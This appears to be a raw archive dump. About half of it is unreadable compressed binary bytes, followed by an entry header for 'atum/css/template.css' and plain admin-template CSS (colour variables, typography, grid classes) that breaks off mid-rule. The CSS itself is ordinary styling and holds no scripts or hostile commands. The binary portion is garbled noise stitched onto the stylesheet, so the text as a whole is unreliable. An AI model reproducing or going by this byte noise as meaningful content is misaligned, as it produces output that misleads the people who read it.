M�I4�dzpB����RJ�uY~�s��R\��>-ŔY��qK)������p����~����o�_5�(@f�l�&Oy�E�x�V�:���%o����+pU�(��&�tG6ѐ��6*���������m�ۧiv4>��҉�\>p{�+?��\v�cߴeM*z|V&��������~BH�6����R���'���!�?}�'��%���Ӳ\!!H�$*O}����|�4i��\�����%�k-Yi��L��r_"���Ͷ7��]�t�緧9�n��e�~������L�~�J
�◂�
iU���C)��‘�%�^�};m6Q�G\�!�|x�~}�<?D���dD}��B���^^nL'	d��D��ω(�����{S���F�{V�O꼉�-�=�#e�w�������3��<�a�Κ���F�^6�4�Õ!��J�lߍ�
�S�aۦ����D��5Xk����̺��’!�&���F���)�]s��l�qB���l4�F�^���Ę����Fa��)�Y�����D��UXk����,���’"�<Y�~V؝�^t�j����?L��[��6���ϴ��v�����FI�ŧ�����/�SziK��j�udC�3�����}�Q������aAg��d��%��,H<�����t<�w��݉�W_�z��O�"���$�>�D�oz}=�C� �)����T�˚�&�i͂���Ȑ�?�a��"~�IqcT����;@�.��,��7�e	=FOl��0�s���\�l}b���UV��'�
�Ͻ�t�di��R�:�yB^�,�Z��f`r�l�~E�&�s��X�N��hzWo�y��h����	�/&�M�3�J>�o��nzצ��.�k��/��A����X�hN[˳-�UB�5�����O%c���*�z<tɢ�#Pҿ���yΆ�V���t�>���E�FY��V�BNS�{%�T}�H�/�oDw�א��Ŀ,�Gv���|Y'g*�A��2�G4E�t1���=���m�\vwze�n�U
�����?�Qy+�j����s5�@�ǞVM�\�yZ������'6�8�:xЋ�Z���̟u����z͵A��c��h���C�bo7��0�a��a)�K�Gz�B�һ�xC’�p^	�t}a2���r2~d���N�*)HE*��o��2�qI(!��Y���`�I/���{��{Ͷ(�"1o���i�g�������=�v��k#~-ߗ�d���萕%�!,�G�A�'��_��n����ʓ��2�G:p)=R��#ݑ��)�?��{��[V�a��Ž,�l��D�+�j������M�u�s���L��R�<g�(���z��|2�J%�����d��ܞF3"{��⮒��.�_Cv�F/�	9�
���n
��حz�5��L�s��"�Gz-��m�.��M������c4�&�f�8��J�1�(�_=�<&(�:���|��:��o��׃��a���z�?����|9dt����Y%�g4��S�':�L���u#�g�~��Ͼ}L�d�����^�'������[2��S�O����駟�[p�
U�x-,߿"Q%¥=�u9��)>�.%���U��o	���s<%�%4����'��\��R�b2efC���>�R2��<�t���~���2��骽�$gvDf�^��h��G7�΄���tK�~�6^xшpג^MLt9�Y�����SY�0*�0��F�j)瘣e��w�5��	���~���|U?q���f�ٛ����G��՗�\�Q��뫳FE]�#�����LfC�gm�œ4/�Q�)��"EE՘�<�u��!r^ڑ.P�)�eek�K⦖���7��k����V��~G>���.�C6�8}#?���Ge����� �9ܹQWln ֱ�&x���	k��ԑ>|�u��	��$.�8�<�������:�e�9�V�#��K!J#V��/�����UĖ��mV��kjF��m�w<
��%���KN�ʪ���zΣ""�_�}��{]J�J�9���'�4�BᐠԩZ�������5���y�yP��Q6h,m�1��ٔ�}��wl��re㦚��է�.[�Ҧ�%��F侺�-�c$���qB#�O|��T���,�"N�@3�$�
���հ���5�~��%�F��(p(����P�2E>T��D�7��}��y��(�t�z;^l���s{o�����	(�-�ʵM�m�T��6��?�q�]�Oe0�M�BP`�����WN�����'���Sl�I"��m��i.��kޞ`�o������xU��D��9U�L��b�J�q�Q;��䦃�e;�w}����ֹ�s�
	c���j�^MnYp��FlY6Th�v��N��񭢮�ۏ�U+���K����ɱ�kSt�T���Φi}U刊]�%n
X/��&�C
��m*u���!���y(e�
4��0�`;�V��EL2���N�v`�<bW���>��D߫�4a!���t����&�
/aťR�{���ؔ�M.z*��d���9�ڪ����(��va5��X=��kR�"�d��ҏ��}�k��H�6SR'u,E���,V�Y���PD����2��{�$_����z�]c�z���h(�"�/��rٜ$���1��U�]M��M�Qu?�6ɐ�_�dЗ�!+��0���"�;ޘ,�l�E,��O]��2U#�"�O�n�%�����T����>X�둅���^�ģ��:I7��8�l��;�<��#�|\����IU>A��<F˧U�-�U�3�|^����EU�@ˉp�t9��3��~��7Er�@r��pJ�|H4*?m�L�R�~s�F���F\5Dz�m͉�9i[3�5�5���m͙�9k[s.k���\Ț��5�VU�o�u:!o}�9OLc.6���LN%�圐�,��ު�r٩�q����XU����9)2v��<�.t�ޣ�V`�����^ѥAϨ��X-I<V��mI䕥w���'�"��T|#>E-��!Q
i�s: �av)����Y,Ĵ���:fq�h���tP�^���^�T*<˥:^+2]H�Rq`-fQ{ٮ���p�ǩ�|���'|����5������̷T�	��#bJL@=9<��)ћ�7��9���#�������ͽ�y�f�ԛ��7�k)�C��!O.�Y|�8��T<�N�[�jAT_J�~9�z��J�[���9�鎤׉:~�?��λ�bJs�Э�fb�Sݒ�"E�ÐFdގ ݕ�N��q�n���z�U�W�aMd��9�oyG��p��[/�Yo�\uiS�^X��mS�jC��8�%��y[IL$��x��ebS6M<��#���˩B��D4y�
�]���&�����`�r�ɲ�*
r�T}ɰ�pj���~,Y%�ӕ�d�'�b��VYw#""
��a��ܚ3'�/Չ�c�O3�~���'t)�a�y	�~ȏ��~j{,�9����*N�z|�4����o؁��:a�O�_��&OKI|K�7��,)3–!$��y��&�ֵi����"�h���\�S���;x]7�U�5�����|Y�������
Wn��'1d.�O5`e-\�=!lg)�����d�EJ��qL���Gc�6��>�!��c�LM�1zn+�4 M27akS-4��T��V��E�3)�7@¶a����7�_�������W�-�J��J\0ꨞ\�����m}Uˀy�������YgT[z`�;!͟N����,�h�4R�SI�c��� _������۹��<�ڲ��x�:ݛ�8W�.�Si� �g�J�ۉD��[�G�vƁ���)68�a�s ��O�SQ�pY=4��ٺ�K�g�g�;c��<Aa��{<����8�-��㠏6�Uq��kF�"�:E�<��c�,k��Xa���a+t��F��Õ�
z�B9�6W��z����^!um�	lW�^7���z�t��
��ѓn0KU���˳����e�SO0����p�J�ye��)^���w�c#�dPI=vݣBrnV�A@;_]�kf\��V�	�����f	ʼn�$Ä��R�Z!�k����ڵ8]��<H���x�P��J��!=�&lv#�3N���qc�c���nA�(%��Q��8���f?��)6�����Ep��z��d�Di�]�i����_��{կ|Y��IPJ�z��ؐ�(�O���C�`�9��i	�O1�&c
1��~��=M
� /#�^��N��*�Y�}Bi���@/�b�#&+�1Y	��nj֪�W�,��+w�~��S�/�hX�Ǝ?��Z�������m�4��̅��@�JSb�H�M�}�ܾ��=O@��%�4ϊjC���_~%Mgi�e��\�񷾲W6��̺��^�π,[Aj��>辽r�{��a�|�}E65�ӏo�E(��Ĩ׻�d�[��|���T���|:�r�c	p���Or�3v��p-�3�Y��S�z���:0p~V�	���q��汿���L�����W;zW�I��ܫ�u�l�ĔfK#�hC�$�d��B��l�K椲�Э=R��&S�h$����W�FW�E�۫�0���+�ej�ɯ�c�˯i�l��w�ސ�.�} o�`�X�^�\���~9����nR�|[z�!���)VV�M��*\j�0���s��g-�R�[����{�Y0��m�0u��D?�+�������`��0u��
ъkA�R�P$C��tȐ�/|?��
�jۜr�og`������F��W�h�Y\��RSMX�}�m1�"%�%�IJ�Y����>���1������̬b�xu�"##��x|�x�ߘ"�R�K�Ū�;Rj<6�ף�r��Ӓ�O��Hu�PK�Ħ�ǘOB�����lQ=��?��Rg
��C]Z�Q��J@G���u�L���=���;u	U��}�۽�E���Ҍ%"Vw�aGF��	ua�Z�
9� ���#crs�?�c����xc���t��1�����w�p�<(��(m��:��(�*���S�{9f�:�Vi���q��i׿
.Vr"��y�j�]�������|���+��!%���I�Yg���n�ƞ�O�Ȓ�mNr���ڸ:Ԝ��^c�����
��;�0߭��L�R��oT\�}V
����㞀P�&��"m2�a�)��ĝ�@�%��ߙ�u��9���H#
Uf\[�CQ���&T^
�U�B��&d����Vn��Χ���hJ!�J����6�դ�h!V�Z���ze`̳r�k�oz����>U���2K�����=md�W'��]��,��FJ
��+k�\����
�h!�yO�Q�~��Áغ��\�]�o��],K�H�hB�\���ٷ�@�=*��^PPT?)�~��	�X��ќ��������q����TeK�0����f5֬F���9,��m�c�7|\;��_X�k<ưȏ�4�-��>�-~�
�C �MT�.z�=��<�C�I��45���?d#C��7���`��ys�upN]��I[�F{W�F��~v�%��?-�GOV�bS��u�
LȾH�U�Z��x�X�`u�?�BE��P�6��)_`h�W���~��[�x�.Zp���,"V7W�i�(����9���h�@0��n�l���X���C����n�^�c�i�딞$�4��/�����D����GOdyʦgq���r暖�%,r7�N�D/?�7�rR�1��c��g�+�tV?43m�|�밆Z���o�C{ ���r)�Q�-�X;�Fm�Y����=:�Y��b�Q'��QG�S��h��w^G`�c�w���F�z��o<Ӈ̇�Lf�uhH]�Dg�v3�R�Z't�t�tj
,��Ñ�J�Tm"ܜ�F�m��I��z�]59�N�_��<k�/��UF��o��~3��u�:�74׎�!��7�G�5F7��4�$�1���끴z���7B�ru�mi��ݻs�OzT��D�(��ws�*;�a�ӦGm]|�B]��ض^"�f�����i\ĴL*�\��MD�缯�v�� �:6��7l}���a��Vɪ��oJМQ�;��R��t�~�����D��wd����}]<���)9c8�U�ƪK���0�MdWQ1ݍ%��k�V����������q��Ha=^�7�zs]8
2�;�;��-ea,t�r��>�`K�x#�Z�bpNf
�[�$��"j�Hj�[��S�^��D6w�-��`N|��:6~�5�
�u�:5"������C[Лȉ�3޵�`?mxW[BAr��k{�8r#�I��՛�U(J�c<�>���#u+V��iz�:k4}��!��4ǵ�Nr��Q}��y���n�9�u	c2���4ז�J�E�k
��H�sU>�-	�+U���.7r#XxXBʼn�c�+=��~J�֮uq�zݘ��tЃq=D�Ysuw!�z%�Bvi�Z��g�2�y�����|�n=z�;�^3K�BLѭ��|�ZL%㦈�̒$�H�u��MO���0<�B$�d��x�a�
�w��w�!���|�|ϳ�A���â|� �$�U� L�H�N�~������Vث����aBWԫ��b���+�?�'%p`=��nGD�=�<̘M����,B8��2H�d��[��G��ݑ��R�u�o����jV{�$p>b�84��~��I�L_:"�~�GO�]�:�6��U�N��|J�B!�k�xk����v`��l:�[�=E�0_��E:ز9�R_�G���q�� Yh�r��5����{*���G٧M6�.�ύ,B!�k:�=�ǀx:��:�VoD dx�a�ݜ!c��A}�������I�-K�;�dC2W�j�#����zu�~{+h�̏f�lU�]�$���$L�x�5�A�Q��h���ݮ:���0��hb�MP�\M�+z�X��)�JT60(,-ȅ"8n�L��{s�m�v��ͮ�U�ʗ�򐦧���p���Z�6��E/H�K۱��4D��R�.�L��ϙ�)��ɦ\,�a�p%j�l�%@�(�_�-Sk?p���lا�):�rf�/�:ص|i�]���~1�]q�E(sZfѸ]��;)Ze�W
Lo��xݾ�Z��*�i���E����Kw�q�ƚ�k����<U�8Ų
��lW�j��(�'�H+G��E���2�ߓŌ�!�::�e�
y��>`��NE���y5~z�l�~/H4�������1�͵�X��D��(M����H�/���~�1_���{i`n�ϝDp"(����WW��^:@1�)��8#�����~�m6H#���jy�諥c���E��?0.�O�R<I�����3��V靠�fH��V��K�m�Rg�������8cl�@@��W�L_���u���[����$l�0�ڝ��5�L�hg.:�����e�W0?�e��3en�y�B[&>�F�/�B���8
��U{x$�	K��^{{P�p�`b5��M�0��>8 ��=��J���I��o��������Y)����gz���~5�􈾀^�*k�����I'z�^�K�H� _j��~�W}&Y�kre�X��)�ޟ.��Ç�dȰF
v��T���W�WX�4�=NO��S��<H�+n#��^ؠ�|���)}���_�=�p�.�I�]�XLJ��~����4`��<>\�u���Q����}`�<��G����ՎK��6��^yVE͐7_��)堝����j�uw��ɭ�6���p���
���{B�5��:G���Y���'�<35��	qe{A��1b5}�L���ݭ�bRY��Xy��/Hcѩ��Z�A��&���>:i�!<j�Tu��D��*C��`޻z�\�)��Yu�����q�A�i�Cjx�f|���[5~z�^�Ț�4X���1Xv��]lv�ׅZh"�L*v���`�Jۜ����P���❾�],n�s�ċ��G�L*�Q��]�v��V-Y���������R�Z�{�k�k��f�#�����MF����N���r��E�\X72�δ'6]�:_g-@o��3��."�O$p�EC�bp��wx�+Q�ʮ=:t��K��܂��ܟ����j�o�T1��f�8z%>�Wݷ6d�j�+��c�Q�$�S��<6�k���u��߫_�W��֨�쪧u5u �ah�S
S{��?����G4�<*S��ם��<ZV�b��d."(.�BfAA���<��إ�3w@���
�o����b�TN�������살�
N~����o-w�[!�-�[�"B �*_��u��zIn��f`�.�P
8��M�Y���9
$�V����i��7�����^&FzI���i9v��a2�T'�0ɹ�7��2[���8`�/��]�!�FK�I
��u�)�3� �x�j}ٍ(��\�]�NHCBh���r��O'�q!���aU���Ń�u���<�U���,����Bu�ӽt�_�3�5Q%k�g�Q�%����	v��j�E�x!+�Q����"<�r�o|��[��;���͔�o '���������'<��wv6Ay�t�0��w��\�"�"�~���(������nTD}�4�b�G,��?�:�yC��g��l����?u*�`�y���ZK��2� R������We���P�&�ˮ߁u�J�P���F�mI?�Ǧ"����H�_��]뻱:�Wӯ��@ݦ�s͞g�yΞ��=�n
�u,�.mI�D�"�LĚ�X3�T5Hu�r����X�sV�<_�\�cad���eYl]M��k��P���	J¯�?TS�V]�$��db���^
r���R�2u��Z"/T!�����I�*�2�ts��P�T�IW�H�*�a��8�:�|k�p&�¹D8��u�%�]�?꧙K|O�}j���>]������4ϵ{��s����s��kC?s�3���g�~����k�|m��y��u��}�/ǵ�1��� B�^֛lu���u�;ܫ��v��~��Z=�k梁Ƃ��z�~�Y�����Np�T�(�sp\��m&�ȯ�ʧ%DّN�Z�S�|m��'�=��|�Ͽ��]��CZ���G۝d��ʂ	�9ĺ\RJ�C�I�TK�������#a�Z�etK�A��D��T<vl^x���J۸�u[���E�2�}���}n/����C���yJԹ�^�	����U�r��m��C�)��������z���?����p��
�@�Bvi��Ủ	1�+�J�s+d�ڷ��A8�`j�T�c�Uytxf�U��j�l�vR���)���*�
��C�]	�n~�[��;W��6�V��p}�4v�_F�J�5�e��\�
�_*�!���zѐ�

$S�V����1	
G��p�>�.��[����fxa�ngzh��0Ë�-:����=U��m�+�N���y5yΌ�
Q��9�y��╅�5y~e�w�R�ւM��g�5��F�xSVԚ�;^���:�-�Uhx�u��[DC�����[��K��+�����=�����Η��O�7�(�uww�z��e�{��@x�,���e9�>�[���]/��[x�$��0�(Y�9F������i��ϠeEs�[�9��̦��93OI�,I<��	��g���D��D��E��wd*2��L-T��>�lU!�j8�9"�H���ccED����n����cB@O̴@��('�0
��eK���	Ƞ��$��0�):���wZ�7�ހ@ں��3�7���$�F,�\0�*J����O�i�����N�|���gԢr0)���uA{��zL.�$��3�apH��/�^F��H>�ݚ6G7���"Č&\,�–M�_P�m�͗��N}y���V���p�&�ܙ.9H��26^�2bj55�J}�-�f�Xm�h�\�Q%F}�"9�<\;��$F�x��m,3��R+�����V~���c�)N��'�X0��
�+�p�xi���s-~�A{~f�މ��"����{�bH��������,�9t����l�g=�������D��M�y��^����.J�7u3b��et�g\�?*���+5S6�<��j#�����8�������Ю�>څKh��?Tۍ�ZO�"�Q/�b��t�f�D�]$���f~g��US7���1ؿT�U������G?8�[ǩ0�n琡�G��L�a8r����Gw����6���ϧ4g Sg���<�Ȓ�gDif��P�9�E1�>������S��^/^�-D�l��V�~R��QK��w�[��$��IH����H��(D	��4�q� ��]��E.��,�O�����o�߀^�n���(M�j+�����Y��K5�rRB��A0 ���L�r`�|t�:�b^|�x)�/��V]��	���g��e�����W'�8�g�U�
���I���zx6��q3�?ۧ�Aj�@/����*���N˃ORG"�Hhw��ݹT����/�dik��R�m���l�IhIp2�qQ�#{.j���UtYqlP��ܧoowm����9n�խw[�=Q�����YJ-���M�"-3������e:'Y3�cN��HlK�׺�$��_�O��@�����c7�ɨa���j�T�6��I���|{}4�>G��:nG"�~�$�S���8�w�GH.�dl)�|y��^�iҿ�`�7%�~��i��/jlj���<(��~�~��h՞�8<}�8�>���x\�o������c�<�YV/�j�L���V�5�L�O��5j��� JK	�'��J�^�\Լ1�9{��,Ge����ٮ�Z�-��_�ce�~PK!���Q�Qatum/css/template.cssnu&1i�@charset "UTF-8";
:root {
  --card-bg: rgba(255, 255, 255, 0.7);
  --bluegray: #b2bfcd;
  --lightbluegray: #f6f9fc;
  --toolbar-bg: #fff;
  --success-border: var(--success);
  --info-border: var(--info);
  --warning-border: var(--warning);
  --danger-border: var(--danger);
  --login-main-bg: #0b1c32;
  --border: #cdcdcd;
  --white: #fff;
  --white-offset: #fefefe;
  --focus: #39f;
  --focus-shadow: 0 0 0 0.2rem #eaeaea;
  --toggle-color: #fff;
  --template-sidebar-bg: var(--template-bg-dark-80);
  --template-sidebar-font-color: #fff;
  --template-sidebar-link-color: #fff;
  --template-bg-light: #f0f4fb;
  --template-text-light: #fff;
  --template-special-color: #001b4c;
  --template-link-color: #2a69b8;
  --template-link-hover-color: #173a65;
  --template-contrast: #2a69b8;
  --template-bg-dark: hsl(var(--hue), 40%, 20%);
  --template-bg-dark-3: hsl(var(--hue), 40%, 97%);
  --template-bg-dark-5: hsl(var(--hue), 40%, 95%);
  --template-bg-dark-7: hsl(var(--hue), 40%, 93%);
  --template-bg-dark-10: hsl(var(--hue), 40%, 90%);
  --template-bg-dark-15: hsl(var(--hue), 40%, 85%);
  --template-bg-dark-20: hsl(var(--hue), 40%, 80%);
  --template-bg-dark-30: hsl(var(--hue), 40%, 70%);
  --template-bg-dark-40: hsl(var(--hue), 40%, 60%);
  --template-bg-dark-50: hsl(var(--hue), 40%, 50%);
  --template-bg-dark-60: hsl(var(--hue), 40%, 40%);
  --template-bg-dark-65: hsl(var(--hue), 40%, 35%);
  --template-bg-dark-70: hsl(var(--hue), 40%, 30%);
  --template-bg-dark-75: hsl(var(--hue), 40%, 25%);
  --template-bg-dark-80: hsl(var(--hue), 40%, 20%);
  --template-bg-dark-90: hsl(var(--hue), 40%, 10%);
  --primary: #132f53;
  --secondary: #495057;
  --success: #457d54;
  --info: #2a69b8;
  --warning: #ffb514;
  --danger: #c52827;
  --light: #f8f9fa;
  --dark: #212529;
  --atum-link-color: #2a69b8;
  --atum-text-dark: #495057;
  --action: #132f53;
  --error: #3b0d0c;
  --alert-success: #0f2f21;
  --font-sans-serif: "Roboto", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
  --font-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
  --gradient: linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));
}

*,
*::before,
*::after {
  box-sizing: border-box;
}

@media (prefers-reduced-motion: no-preference) {
  :root {
    scroll-behavior: smooth;
  }
}

body {
  margin: 0;
  font-family: var(--font-sans-serif);
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: #fff;
  -webkit-text-size-adjust: 100%;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

hr {
  margin: 1rem 0;
  color: inherit;
  background-color: currentColor;
  border: 0;
  opacity: 0.25;
}

hr:not([size]) {
  height: 1px;
}

h6, .h6, h5, .h5, h4, .h4, h3, .h3, h2, .h2, h1, .h1 {
  margin-top: 0;
  margin-bottom: 0.5rem;
  font-weight: 500;
  line-height: 1.2;
  color: var(--template-bg-dark);
}

h1, .h1 {
  font-size: calc(1.29rem + 0.48vw);
}
@media (min-width: 1200px) {
  h1, .h1 {
    font-size: 1.65rem;
  }
}

h2, .h2 {
  font-size: calc(1.275rem + 0.3vw);
}
@media (min-width: 1200px) {
  h2, .h2 {
    font-size: 1.5rem;
  }
}

h3, .h3 {
  font-size: 1.25rem;
}

h4, .h4 {
  font-size: 1rem;
}

h5, .h5 {
  font-size: 0.9286rem;
}

h6, .h6 {
  font-size: 0.8571rem;
}

p {
  margin-top: 0;
  margin-bottom: 1rem;
}

abbr[title],
abbr[data-bs-original-title] {
  -webkit-text-decoration: underline dotted;
          text-decoration: underline dotted;
  cursor: help;
  -webkit-text-decoration-skip-ink: none;
          text-decoration-skip-ink: none;
}

address {
  margin-bottom: 1rem;
  font-style: normal;
  line-height: inherit;
}

ol,
ul {
  padding-left: 2rem;
}

ol,
ul,
dl {
  margin-top: 0;
  margin-bottom: 1rem;
}

ol ol,
ul ul,
ol ul,
ul ol {
  margin-bottom: 0;
}

dt {
  font-weight: 700;
}

dd {
  margin-bottom: 0.5rem;
  margin-left: 0;
}

blockquote {
  margin: 0 0 1rem;
}

b,
strong {
  font-weight: bolder;
}

small, .small {
  font-size: 0.875em;
}

mark, .mark {
  padding: 0.2em;
  background-color: #fcf8e3;
}

sub,
sup {
  position: relative;
  font-size: 0.75em;
  line-height: 0;
  vertical-align: baseline;
}

sub {
  bottom: -0.25em;
}

sup {
  top: -0.5em;
}

a {
  color: var(--template-link-color);
  text-decoration: none;
}
a:hover {
  color: var(--template-link-hover-color);
}

a:not([href]):not([class]), a:not([href]):not([class]):hover {
  color: inherit;
  text-decoration: none;
}

pre,
code,
kbd,
samp {
  font-family: var(--font-monospace);
  font-size: 1em;
  direction: ltr /* rtl:ignore */;
  unicode-bidi: bidi-override;
}

pre {
  display: block;
  margin-top: 0;
  margin-bottom: 1rem;
  overflow: auto;
  font-size: 0.875em;
}
pre code {
  font-size: inherit;
  color: inherit;
  word-break: normal;
}

code {
  font-size: 0.875em;
  color: #971250;
  word-wrap: break-word;
}
a > code {
  color: inherit;
}

kbd {
  padding: 0.2rem 0.4rem;
  font-size: 0.875em;
  color: #fff;
  background-color: #212529;
  border-radius: 0.2rem;
}
kbd kbd {
  padding: 0;
  font-size: 1em;
  font-weight: 700;
}

figure {
  margin: 0 0 1rem;
}

img,
svg {
  vertical-align: middle;
}

table {
  caption-side: bottom;
  border-collapse: collapse;
}

caption {
  padding-top: 0.75rem;
  padding-bottom: 0.75rem;
  color: #666e76;
  text-align: left;
}

th {
  text-align: inherit;
  text-align: -webkit-match-parent;
}

thead,
tbody,
tfoot,
tr,
td,
th {
  border-color: inherit;
  border-style: solid;
  border-width: 0;
}

label {
  display: inline-block;
}

button {
  border-radius: 0;
}

button:focus:not(:focus-visible) {
  outline: 0;
}

input,
button,
select,
optgroup,
textarea {
  margin: 0;
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}

button,
select {
  text-transform: none;
}

[role=button] {
  cursor: pointer;
}

select {
  word-wrap: normal;
}
select:disabled {
  opacity: 1;
}

[list]::-webkit-calendar-picker-indicator {
  display: none;
}

button,
[type=button],
[type=reset],
[type=submit] {
  -webkit-appearance: button;
}
button:not(:disabled),
[type=button]:not(:disabled),
[type=reset]:not(:disabled),
[type=submit]:not(:disabled) {
  cursor: pointer;
}

::-moz-focus-inner {
  padding: 0;
  border-style: none;
}

textarea {
  resize: vertical;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}

legend {
  float: left;
  width: 100%;
  padding: 0;
  margin-bottom: 0.5rem;
  font-size: calc(1.275rem + 0.3vw);
  line-height: inherit;
}
@media (min-width: 1200px) {
  legend {
    font-size: 1.5rem;
  }
}
legend + * {
  clear: left;
}

::-webkit-datetime-edit-fields-wrapper,
::-webkit-datetime-edit-text,
::-webkit-datetime-edit-minute,
::-webkit-datetime-edit-hour-field,
::-webkit-datetime-edit-day-field,
::-webkit-datetime-edit-month-field,
::-webkit-datetime-edit-year-field {
  padding: 0;
}

::-webkit-inner-spin-button {
  height: auto;
}

[type=search] {
  outline-offset: -2px;
  -webkit-appearance: textfield;
}

/* rtl:raw:
[type="tel"],
[type="url"],
[type="email"],
[type="number"] {
  direction: ltr;
}
*/
::-webkit-search-decoration {
  -webkit-appearance: none;
}

::-webkit-color-swatch-wrapper {
  padding: 0;
}

::file-selector-button {
  font: inherit;
}

::-webkit-file-upload-button {
  font: inherit;
  -webkit-appearance: button;
}

output {
  display: inline-block;
}

iframe {
  border: 0;
}

summary {
  display: list-item;
  cursor: pointer;
}

progress {
  vertical-align: baseline;
}

[hidden] {
  display: none !important;
}

.lead {
  font-size: 1.25rem;
  font-weight: 300;
}

.display-1 {
  font-size: calc(1.625rem + 4.5vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-1 {
    font-size: 5rem;
  }
}

.display-2 {
  font-size: calc(1.575rem + 3.9vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-2 {
    font-size: 4.5rem;
  }
}

.display-3 {
  font-size: calc(1.525rem + 3.3vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-3 {
    font-size: 4rem;
  }
}

.display-4 {
  font-size: calc(1.475rem + 2.7vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-4 {
    font-size: 3.5rem;
  }
}

.display-5 {
  font-size: calc(1.425rem + 2.1vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-5 {
    font-size: 3rem;
  }
}

.display-6 {
  font-size: calc(1.375rem + 1.5vw);
  font-weight: 300;
  line-height: 1.2;
}
@media (min-width: 1200px) {
  .display-6 {
    font-size: 2.5rem;
  }
}

.list-unstyled {
  padding-left: 0;
  list-style: none;
}

.list-inline {
  padding-left: 0;
  list-style: none;
}

.list-inline-item {
  display: inline-block;
}
.list-inline-item:not(:last-child) {
  margin-right: 0.5rem;
}

.initialism {
  font-size: 0.875em;
  text-transform: uppercase;
}

.blockquote {
  margin-bottom: 1rem;
  font-size: 1.25rem;
}
.blockquote > :last-child {
  margin-bottom: 0;
}

.blockquote-footer {
  margin-top: -1rem;
  margin-bottom: 1rem;
  font-size: 0.875em;
  color: #666e76;
}
.blockquote-footer::before {
  content: "— ";
}

.img-fluid {
  max-width: 100%;
  height: auto;
}

.img-thumbnail {
  padding: 0.25rem;
  background-color: #fff;
  border: 1px solid #dee2e6;
  border-radius: 0.25rem;
  max-width: 100%;
  height: auto;
}

.figure {
  display: inline-block;
}

.figure-img {
  margin-bottom: 0.5rem;
  line-height: 1;
}

.figure-caption {
  font-size: 0.875em;
  color: #666e76;
}

.container,
.container-fluid,
.container-xxl,
.container-xl,
.container-lg,
.container-md,
.container-sm {
  width: 100%;
  padding-right: var(--gutter-x, 1rem);
  padding-left: var(--gutter-x, 1rem);
  margin-right: auto;
  margin-left: auto;
}

@media (min-width: 576px) {
  .container-sm, .container {
    max-width: 540px;
  }
}
@media (min-width: 768px) {
  .container-md, .container-sm, .container {
    max-width: 720px;
  }
}
@media (min-width: 992px) {
  .container-lg, .container-md, .container-sm, .container {
    max-width: 960px;
  }
}
@media (min-width: 1200px) {
  .container-xl, .container-lg, .container-md, .container-sm, .container {
    max-width: 1140px;
  }
}
@media (min-width: 1400px) {
  .container-xxl, .container-xl, .container-lg, .container-md, .container-sm, .container {
    max-width: 1320px;
  }
}
.row {
  --gutter-x: 2rem;
  --gutter-y: 0;
  display: flex;
  flex-wrap: wrap;
  margin-top: calc(var(--gutter-y) * -1);
  margin-right: calc(var(--gutter-x) * -.5);
  margin-left: calc(var(--gutter-x) * -.5);
}
.row > * {
  flex-shrink: 0;
  width: 100%;
  max-width: 100%;
  padding-right: calc(var(--gutter-x) * .5);
  padding-left: calc(var(--gutter-x) * .5);
  margin-top: var(--gutter-y);
}

.col {
  flex: 1 0 0%;
}

.row-cols-auto > * {
  flex: 0 0 auto;
  width: auto;
}

.row-cols-1 > * {
  flex: 0 0 auto;
  width: 100%;
}

.row-cols-2 > * {
  flex: 0 0 auto;
  width: 50%;
}

.row-cols-3 > * {
  flex: 0 0 auto;
  width: 33.3333333333%;
}

.row-cols-4 > * {
  flex: 0 0 auto;
  width: 25%;
}

.row-cols-5 > * {
  flex: 0 0 auto;
  width: 20%;
}

.row-cols-6 > * {
  flex: 0 0 auto;
  width: 16.6666666667%;
}

@media (min-width: 576px) {
  .col-sm {
    flex: 1 0 0%;
  }

  .row-cols-sm-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-sm-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-sm-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-sm-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-sm-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-sm-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-sm-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 768px) {
  .col-md {
    flex: 1 0 0%;
  }

  .row-cols-md-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-md-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-md-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-md-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-md-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-md-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-md-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 992px) {
  .col-lg {
    flex: 1 0 0%;
  }

  .row-cols-lg-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-lg-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-lg-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-lg-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-lg-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-lg-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-lg-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 1200px) {
  .col-xl {
    flex: 1 0 0%;
  }

  .row-cols-xl-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

